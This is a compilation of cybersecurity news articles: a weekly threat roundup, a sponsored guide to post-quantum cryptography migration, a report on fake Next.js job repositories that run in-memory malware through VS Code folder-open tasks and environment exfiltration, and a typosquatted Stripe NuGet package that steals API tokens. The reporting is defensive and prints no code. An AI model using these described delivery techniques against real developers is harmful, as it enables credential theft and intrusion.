Once a prolific ransomware gang, Conti shut down its operations in mid-2022 after splintering into small groups. Ad cloaking service exposed 1Campaign Service Helps Malicious Google Ads Evade Detection Varonis has disclosed details of a newly identified cybercrime service known as 1Campaign that enables threat actors to run malicious Google Ads for extended periods of time while evading scrutiny. The cloaking platform “passes Google’s screening, filters out security researchers, and keeps phishing and crypto drainer pages online for as long as possible, funneling real users to attacker-controlled sites,” Varonis security researcher Daniel Kelley said . “It combines real-time visitor filtering, fraud scoring, geographic targeting, and a bot guard script generator into a single dashboard.” It’s developed and maintained by a threat actor named DuppyMeister for over three years, along with offering Telegram channels for support.

Traffic linked to 1Campaign has been distributed across the U.S., Canada, the Netherlands, China, Germany, France, Japan, Hungary, and Albania. Teams call drops macOS malware Social Engineering Using Teams Leads to macOS Malware A social engineering campaign has been observed using Microsoft Teams meetings to trick attendants into installing macOS malware. Daylight Security has assessed that the activity is consistent with an ongoing attack campaign orchestrated by North Korean threat actors under the name GhostCall . “During the call, the attacker claimed audio issues and coached the victim into running terminal commands that downloaded and executed malicious binaries,” Daylight researchers Kyle Henson and Oren Biderman said .

“Analysts observed staged downloads and execution from macOS cache and temporary paths, Keychain credential access, and outbound connections to newly created attacker-controlled domains.” RAMP fallout reshapes underground What Happened Post RAMP Shutdown? Last month, law enforcement authorities from the U.S. seized the notorious RAMP cybercrime forum . The event has had a cascading impact, destabilising trust and accelerating fragmentation across the underground cybercrime ecosystem.

There are also speculations that RAMP may have functioned as a honeypot or had been compromised long before its seizure. “Rather than consolidating around a single successor, ransomware actors are redistributing across both gated platforms like T1erOne and accessible forums such as Rehub,” Rapid7 said . “This shift reflects adaptation, not decline. Disruption fractures trust and redistributes coordination across multiple platforms.” Anonymous Fénix members detained Spain Arrests Suspected Hacktivists for DDoS Attacks Spanish authorities have announced the arrest of four members of the Anonymous Fénix group for their involvement in distributed denial-of-service (DDoS) attacks.

The suspects, whose names were not disclosed, targeted the websites of government ministries, political parties, and public institutions. Two of the group leaders were arrested in May 2025. The first attacks occurred in April 2023. The group is said to have intensified its activities beginning in September 2024, recruiting volunteers to mount DDoS attacks against targets of interest.

Judicial spear-phish drops RAT Argentina’s Judicial Sector Targeted by RAT Malware A spear-phishing campaign has been observed targeting Argentina’s judicial sector that delivers a ZIP archive containing a Windows shortcut that, when launched, displays a decoy PDF to the victims, while stealthily dropping a Rust-based remote access trojan (RAT). “The campaign leverages highly authentic judicial decoy documents to exploit trust in court communications, enabling successful delivery of a covert remote access trojan and facilitating long-term access to sensitive legal and institutional data,” Seqrite Labs said . Typosquat spreads ValleyRAT Fake Huorong Website Drops ValleyRAT A persuasive lookalike website of Huorong Security antivirus (“huoronga[.]com”) has been used to deliver a RAT malware known as ValleyRAT . The campaign is the work of a Chinese cybercrime group called Silver Fox, which has a history of distributing trojanized versions of popular Chinese software and other popular programs through typosquatted domains to distribute trojanized installers responsible for deploying ValleyRAT.

“Once it’s installed, attackers can monitor the victim, steal sensitive information, and remotely control the system,” Malwarebytes said . Repo-squatting via Google Ads GPUGate Campaign Delivers Hijack Loader Users searching for developer tools have become the target of an ongoing campaign dubbed GPUGate that uses a malicious installer to deliver Hijack Loader and Atomic Stealer . “The attacker creates a throwaway GitHub account and forks the official GitHub Desktop repository,” GMO Cybersecurity by Ierae said . “The attacker edits the download link in the README to point to their malicious installer and commits the change.

Lastly, the attacker used sponsored ads for ‘GitHub Desktop’ to promote their commit, using an anchor in README.md to skip past GitHub’s cautions.” Victims who downloaded the malicious Windows installer would execute a multi-stage loader, while Mac victims received Atomic Stealer. These stories may seem separate, but they point in the same direction. Speed is increasing. Deception is improving.

And attackers are finding new ways to blend into everyday activity. The warning signs are there for those who look closely. Small gaps, delayed patches, misplaced trust, and rushed clicks still make the biggest difference. Staying aware of these shifts is no longer optional.

The details change each week. The pressure does not. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Expert Recommends: Prepare for PQC Right Now

Introduction: Steal It Today, Break It in a Decade Digital evolution is unstoppable, and though the pace may vary, things tend to fall into place sooner rather than later. That, of course, applies to adversaries as well. The rise of ransomware and cyber extortion generated funding for a complex and highly professional criminal ecosystem. The era of the cloud brought general availability of almost infinite amounts of storage.

So there is literally nothing that stops criminals from stealing and trafficking heaps of data, be it encrypted or not. Patient adversaries are employing a “Harvest Now, Decrypt Later” (HNDL) strategy. They are quietly accumulating encrypted data with the intention of decrypting it later using quantum computers. Any data requiring long-term security, such as trade secrets or classified designs, is vulnerable because its lifespan will inevitably outlive its current encryption.

Therefore, it is crucial that organizations begin planning their PQC migration now, ensuring that data encrypted today remains secure against future quantum-enabled decryption attacks. The Quantum Waiting Game Cryptography is the backbone of digital trust, but the looming era of quantum computing threatens its foundations. Harnessing quantum physics, future quantum machines will effortlessly break the mathematical encryption schemes that protect data today. Current prototypes [1] are not quite there yet because they fundamentally lack the scale and error-correction capability required to successfully execute complex quantum algorithms.

However, the prospect of a mature, cryptographically relevant quantum computer (CRQC) is alarming. Such a machine could likely break modern encryption in a matter of minutes, likely by 2030 to 2035. To combat the looming quantum computing threat, our cryptography must evolve immediately. This is why Post-Quantum Cryptography (PQC) [2] is being introduced as a solution.

PQC provides new cryptographic algorithms designed to withstand attacks from both today’s classical computers and future quantum machines. A Step-by-Step Guide to Future-Proofing with PQC PQC migration is a complex process that spans the entire organization and potentially reaches deep into its security architecture. This massive transition is complicated by the current state of industry planning. There is still a lack of consensus in technical literature regarding common steps or uniform terminology for migration strategies.

Without a common language, companies find it difficult to effectively compare, adopt, or coordinate the most suitable migration strategies. Our research concludes that the following strategy offers an effective, universal framework that can be adapted to suit any organization. [3, 4, 5, 6, 7, 8, 9] Security Navigator 2026 is Here - Download Now The newly released Security Navigator 2026 offers critical insights into current digital threats, documenting 139,373 incidents and 19,053 confirmed breaches. More than just a report, it serves as a guide to navigating a safer digital landscape.

What’s Inside? 📈 In-Depth Analysis: Statistics from CyberSOC, Vulnerabilitiy scanning, Pentesting, CERT, Cy-X and Ransomware observations from Dark Net surveillance. 🔮 Future-Ready: Equip yourself with security predictions and stories from the field. 🧠 Stories from security practitioners across the world.

👁️ Security deep-dives: Get briefed on emerging trends related to Generative AI, Operational Technology and post-quantum cryptography. Stay one step ahead in cybersecurity. Your essential guide awaits! 🔗 Get Your Copy Now At this stage, it is important to emphasize that a migration team must be established for each migration.

This team should consist of cryptography and cybersecurity experts and managers from the software system or infrastructure being migrated. The team will drive the migration process forward and ensure its completion. Step 1 (Preparation): This phase establishes the scope and leadership for the PQC migration process. Key activities include assessing the relevance and urgency of PQC, appointing a program lead, aligning stakeholders on clear goals, and initiating conversations with vendors to determine migration needs.

Step 2 (Diagnosis): This phase involves a thorough evaluation of the current cybersecurity posture to establish a comprehensive security baseline. Key activities include documenting all cryptographic assets, categorizing data based on their confidential lifespan, identifying suppliers of cryptographic tools to evaluate their PQC readiness, and conducting a formal risk assessment to generate a prioritized asset list based on principles such as Mosca’s theorem [12] . Step 3 (Planning): Once the urgency and scope are determined, this phase focuses on the “how” and “when“. It focuses on the migration strategy, creating a comprehensive business and technical plan and timeline based on the urgency and scope determined in previous steps.

Key activities involve appointing a dedicated migration manager to oversee the process and conducting a comprehensive cost estimate for the entire migration. Step 4 (Execution): This critical phase involves executing the plan to establish a quantum-safe environment through careful technical implementation. Key activities include maintaining backward compatibility via a hybrid cryptographic approach, implementing recommended PQC primitives for key exchange and signatures, adjusting key sizes, and integrating cryptographic agility to ensure rapid adaptation with minimal service disruption. Step 5 (Continuous Monitoring and Update): This final phase focuses on continuous vigilance after migration, recognizing the dynamic cryptographic landscape.

Key activities include routinely reviewing and updating the cryptographic inventory, conducting regular reviews of emerging threats to PQC schemes, performing proactive security audits and vulnerability assessments, and staying updated on the latest PQC advances to ensure timely system and software updates. Addressing Key Challenges: A Practical Checklist To ensure a successful PQC migration, organizations must proactively identify and mitigate key obstacles that could hinder progress. They must recognize that the transition involves navigating three interdependent categories of challenges. Organizational challenges: These non-technical obstacles relate to people, strategic planning, internal governance, and coordination across the wider ecosystem, often complicated by a lack of urgency or qualified personnel.

PQC challenges: These stem directly from the immaturity of the new technology. Although we now have initial standards, such as ML-KEM and its implementation in protocols like TLS, a lack of standardization for a complete suite of algorithms and uncertainty in selecting and testing reliable PQC solutions remain major hurdles. The main issue is the lack of specific implementation guidelines, such as how to effectively deploy hybridization or agility mechanisms. Code and Documentation challenges: These are technical hurdles caused by the inherent rigidity of existing IT infrastructure (legacy systems), the need for extensive code modification, and the complexity of implementing secure cryptographic changes.

The following breaks down the major obstacles to a successful PQC migration and offers solutions for each. Each obstacle falls under one of the previously established challenge categories. See references [71] and [11] for a more comprehensive discussion of additional obstacles. Lack of Urgency and Business Case (Organizational): Problem: The quantum threat seems distant, making it challenging to establish a sense of urgency and budget approval from leadership.

Solution: Organizations can use tools like Mosca’s Theorem [12] to quantify their vulnerability and take inventory of cryptographic assets to improve current cybersecurity regardless of the quantum timeline. Internal Knowledge and Skills Deficit (Organizational): Problem: Lack of internal knowledge about quantum-based threats, and shortage of qualified personnel to implement new PQC solutions. Solution: Launch training initiatives for IT and management. Engage external PQC consultants to design the strategy and knowledge transfer.

Internal Governance and Planning (Organizational): Problem: Absence of PQC governance and a fully articulated transition plan, leading to ineffective task prioritization and operational inefficiencies. Solution: Appoint a PQC migration manager or steering committee to mandate a cryptographic inventory for risk-based migration prioritization. Ecosystem and Coordination Failures (Organizational): Problem: Lack of ecosystem engagement, unclear governance, and limited collaboration hamper the PQC transition. Solution: Proactively manage vendor relationships and join industry forums to share knowledge, collaborate, and influence standards development.

Regulatory Voids (Organizational): Problem: Existing regulations (e.g. NIS2 and DORA) mandate the use of state-of-the-art cryptography while new PQC-specific laws are pending. Solution: Adopt recent PQC standards proactively for critical systems to meet the “state-of-the-art” requirement. Leverage EUCC certification and monitor ETSI/OpenSSL for implementation guidance.

Uncertain Selection Criteria (PQC): Problem: Organizations struggle to decide between an all-at-once or phased hybrid approach to replacing PQC, as they lack clear criteria. Solution: Default to a hybrid PQC model to gain operational knowledge, and minimize complications before committing to a full replacement strategy. Security and Reliability Concerns (PQC): Problem: Uncertainty about the maturity and security of PQC algorithms, organizations must balance present-day protection and future resilience. Solution: Use a hybrid PQC approach with a staged rollout.

Begin with non-critical areas before expanding to ensure the solution is stable and reliable. Rigidity of Legacy Systems (Code and Documentation): Problem: Legacy systems inflexibility. This is exacerbated in resource-constrained devices, e.g. IoT and smart cards, which lack the memory and power necessary for larger PQC keys and intense computations.

Solution: Replace hardware to accommodate PQC demands. If this is not feasible, implement lightweight, optimized PQC libraries. Ecosystem Interdependency (Code and Documentation): Problem: The interconnected nature of the Public Key Infrastructure (PKI) means that a PQC transition affects all involved parties, including standards bodies, hardware/software vendors, and certificate authorities (CAs). Solution: Collaborate with suppliers and CAs, participate in industry and regulatory groups (e.g., NIST, CISA, ENISA, ETSI, ANSSI, NCSC and BSI), and map all third-party component dependencies.

Lack of Certified and Approved Components (Code and Documentation):
Problem:
Limited availability of certified components (eg HSMs) from vendors, especially in regulated sectors such as finance and government. Solution: During procurement, organizations must mandate FIPS 140-3 or EUCC validation for PQC-capable hardware, while beginning software-level migration (e.g., TLS/SSH) in parallel. Lack of Agility (Code and Documentation): Problem: Current systems are cryptographically inflexible. This makes adapting to new threats or evolving standards slow and complex due to the need for intricate code changes.

Solution: Prioritize cryptographic agility by designing new systems that allow for algorithm swapping via simple configuration and centralized key and certificate support. Key Takeaways Urgency of Migration: Act immediately! The deadline is now. The time for waiting for CRQC is over.

Organizations must start preparing and migrating their data immediately to ensure long-term security. Establish Foundational Priorities: Strategic efforts must focus on developing a clear, actionable strategy for planning and executing the PQC transition smoothly. Foster United Collaboration: The PQC transition demands a unified effort to address the collective security challenge. This requires actively sharing lessons learned and collaborating across industries, governments, and academia.

Embed Hybrid Cryptography and Cryptographic Agility: The ability to rapidly and seamlessly combine, modify or swap cryptographic primitives must be adopted as the cornerstone of the new security posture to adapt to future advances in quantum-safe standards. Acknowledge Interdependent Challenges: The success of any PQC migration hinges on recognizing that the transition involves navigating several interdependent categories of challenges. This is just an excerpt of the many topics covered in the Security Navigator 2026 . For more in-depth articles on the use and abuse of Generative AI, Hacktivism and cybercrime, Vulnerability management and Cyber Extortion, as well as CyberSOC statistics and security predictions, you should check out the full report!

Head over to the download page and get a copy. References: [1] The Quantum Insider – Quantum Computing Roadmaps: A Look at the Maps and Predictions of Major Quantum Players [2] cnlab – Post-Quantum Cryptography: A Comprehensive Guide [3] ETSI – Migration Strategies and Recommendations for Quantum Safe Schemes [4] NCSC – Timelines for Migration to Post-Quantum Cryptography [5] Encryption Consulting – Enterprise Guide to PQC Migration [6] NIST – Migration to Post-Quantum Cryptography: Preparation for Considering the Implementation and Adoption of Quantum Safe Cryptography [7] arXiv – Identifying Research Challenges in Post Quantum Cryptography Migration and Cryptographic Agility [8] CISA – Quantum-Readiness: Migration to Post-Quantum Cryptography [9] BSI – Quantum-Safe Cryptography: Fundamentals, Current Developments and Recommendations [10] Orange Cyberdefense – 8 Minutes to Stay in Control: Quantum and Security [11] NXP – Post-Quantum Cryptographic Migration Challenges for Embedded Devices [12] IEEE Security & Privacy – Cybersecurity in an Era with Quantum Computers: Will We Be Ready? Note: This article was expertly written and contributed by Mohammed Meziani, Senior Security Consultant at Orange Cyberdefense. Found this article interesting?

This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Microsoft Warns Developers of Fake Next.js Job Repos Delivering In-Memory Malware

A “coordinated developer-targeting campaign” is using malicious repositories disguised as legitimate Next.js projects and technical assessments to trick victims into executing them and establish persistent access to compromised machines. “The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report published this week. The tech giant said the campaign is characterized by the use of multiple entry points that lead to the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to facilitate command-and-control (C2). The attacks rely on the threat actors setting up fake repositories on trusted developer platforms like Bitbucket, using names like “Cryptan-Platform-MVP1” to trick developers looking for jobs into running them as part of an assessment process.

Further analysis of the identified repositories has uncovered three distinct execution paths that, while triggered in different ways, have the end goal of executing an attacker‑controlled JavaScript directly in memory - Visual Studio Code workspace execution , where Microsoft Visual Studio Code (VS Code) projects with workspace automation configuration are used to run malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project. This involves the use of the runOn: “folderOpen” to configure the task. Build‑time execution during application development , where manually running the development server via “ npm run dev “ is enough to activate the execution of malicious code embedded within modified JavaScript libraries masquerading as jquery.min.js, causing it to fetch a JavaScript loader hosted on Vercel. The retrieved payload is then executed in memory by Node.js.

Server startup execution via environment exfiltration and dynamic remote code execution , where launching the application backend causes malicious loader logic concealed within a backend module or route file to be executed. The loader transmits the process environment to the external server and executes JavaScript received as a response in memory within the Node.js server process. Microsoft noted that all three methods lead to the same JavaScript payload that’s responsible for profiling the host and periodically polling a registration endpoint to get a unique “instanceId” identifier. This identifier is subsequently supplied in follow-on polls to correlate activity.

It’s also capable of executing server-provided JavaScript in memory, ultimately paving the way for a second-stage controller that turns the initial foothold into a persistent access pathway for receiving tasks by contacting a different C2 server and executing them in memory to minimize leaving traces on disk. Attack chain overview “The controller maintains stability and session continuity, posts error telemetry to a reporting endpoint, and includes retry logic for resilience,” Microsoft said. “It also tracks spawned processes and can stop managed activity and exit cleanly when instructed. Beyond on-demand code execution, Stage 2 supports operator-driven discovery and exfiltration.” While the Windows maker did not attribute the activity to a specific threat actor, the use of VS Code tasks and Vercel domains to stage malware is a tactic that has been adopted by North Korea-linked hackers associated with a long-running campaign known as Contagious Interview .

The end goal of these efforts is to gain the ability to deliver malware to developer systems, which often contain sensitive data, such as source code, secrets, and credentials, that can provide opportunities to pivot deeper into the target network. Using GitHub gists in VS Code tasks.json instead of Vercel URLs In a report published Wednesday, Abstract Security said it has observed a shift in threat actor tactics, notably a spike in alternative staging servers used in the VS Code tasks commands instead of Vercel URLs. This includes the use of scripts hosted on GitHub gists (“gist.githubusercontent[.]com”) to download and run next-stage payloads. An alternative approach employs URL shorteners like short[.]gy to conceal Vercel URLs.

The cybersecurity company said it also identified a malicious npm package , named “eslint-validator,” linked to the campaign that retrieves and runs an obfuscated payload from a Google Drive URL. The payload in question is a known JavaScript malware referred to as BeaverTail. Furthermore, a malicious VS Code task embedded within a GitHub repository has been found to initiate a Windows-only infection chain that runs a batch script to download Node.js runtime on the host (if it does not exist) and leverage the certutil program to parse a code block contained within the script. The decoded script is then executed with the previously obtained Node.js runtime to deploy a Python malware protected with PyArmor.

Cybersecurity company Red Asgard, which has also been extensively tracking the campaign , said the threat actors have leveraged crafted VS code projects that use the runOn: “folderOpen” trigger to deploy malware that, in turn, queries the Polygon blockchain to retrieve JavaScript stored within an NFT contract for improved resilience. The final payload is an information stealer that harvests credentials and data from web browsers, cryptocurrency wallets, and password managers. Distribution of staging infrastructure used by North Korean threat actors in 2025 “This developer‑targeting campaign shows how a recruiting‑themed ‘interview project’ can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend,” Microsoft concluded. To counter the threat, the company is recommending that organizations harden developer workflow trust boundaries, enforce strong authentication and conditional access, maintain strict credential hygiene, apply the principle of least privilege to developer accounts and build identities, and separate build infrastructure where feasible.

The development comes as GitLab said it banned 131 unique accounts in 2025 that were engaged in distributing malicious code projects linked to the Contagious Interview campaign and the fraudulent IT worker scheme known as Wagemole . “Threat actors typically originated from consumer VPNs when interacting with GitLab.com to distribute malware; however, they also intermittently originated from dedicated VPS infrastructure and likely laptop farm IP addresses,” GitLab’s Oliver Smith said . “Threat actors created accounts using Gmail email addresses in almost 90% of cases.” In more than 80% of the cases, per the software development platform, the threat actors are said to have leveraged at least six legitimate services to host malware payloads, including JSON Keeper, Mocki, npoint.io, Render, Railway.app, and Vercel. Among these, Vercel was the most commonly used, with the threat actors relying on the web development platform no less than 49 times in 2025.

“In December, we observed a cluster of projects executing malware via VS Code tasks, either piping remote content to a native shell or executing a custom script to decode malware from binary data in a fake font file,” Smith added, corroborating the aforementioned findings from Microsoft. Assessed organization chart of the North Korean IT worker cell Also discovered by GitLab was a private project “almost certainly” controlled by a North Korean national managing a North Korean IT worker cell that contained detailed financial and personnel records showing earnings of more than $1.64 million between Q1 2022 and Q3 2025. The project included more than 120 spreadsheets, presentations, and documents tracking quarterly income performance for individual team members. “Records demonstrate that these operations function as structured enterprises with defined targets and operating procedures and close hierarchical oversight,” GitLab noted.

“This cell’s demonstrated ability to cultivate facilitators globally provides a high degree of operational resiliency and money laundering flexibility.” A GitHub account associated with a North Korean IT worker In a report published earlier this month, Okta said the “vast majority” of interviews with IT workers do not progress to a second interview or job offer, but noted they are “learning from their mistakes” and that a large number of them seek temporary contract work as software developers hired out to third-party companies to take advantage of the fact that they are unlikely to enforce rigorous background checks. “Some actors however seem to be more competent at crafting personas and passing screening interviews,” it added . “A kind of IT Worker natural selection is at play. The most successful actors are very prolific, and scheduled hundreds of interviews each.” Found this article interesting?

Malicious StripeApi NuGet Package Mimicked Official Library and Stole API Tokens

Cybersecurity researchers have disclosed details of a new malicious package discovered on the NuGet Gallery, impersonating a library from financial services firm Stripe in an attempt to target the financial sector. The package, codenamed StripeApi.Net, attempts to masquerade as Stripe.net , a legitimate library from Stripe that has over 75 million downloads. It was uploaded by a user named StripePayments on February 16, 2026. The package is no longer available.

“The NuGet page for the malicious package is set up to resemble the official Stripe.net package as closely as possible,” ReversingLabs Petar Kirhmajer said . “It uses the same icon as the legitimate package and contains a nearly identical readme, only swapping the ‘Stripe.net’ references to read ‘Stripe-net.’” In a further effort to lend credibility to the typosquatted package, the threat actor behind the campaign is said to have artificially inflated the download count to more than 180,000. But in an interesting twist, the downloads were split across 506 versions, with each version recording about 300 downloads on average. The package replicates some of the legitimate Stripe package’s functionality, but also modifies certain critical methods to collect and transfer sensitive data, including the user’s Stripe API token, back to the threat actor.

With the rest of the codebases remaining fully functional, it’s unlikely to attract any suspicion from unsuspecting developers who may have inadvertently downloaded it. ReversingLabs said it discovered and reported the package “relatively soon” after it was initially released, causing it to be taken before it could inflict any serious damage. The software supply chain security company also noted that the activity marks a shift from prior campaigns that have leveraged bogus NuGet packages to target the cryptocurrency ecosystem and facilitate wallet key theft. “Developers who mistakenly download and integrate a typosquatted library like StripeAPI.net will still have their applications compile successfully and function as intended,” Kirhmajer said.

“Payments would process normally and, from the developer’s perspective, nothing would appear broken. In the background, however, sensitive data is being secretly copied and exfiltrated by malicious actors.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.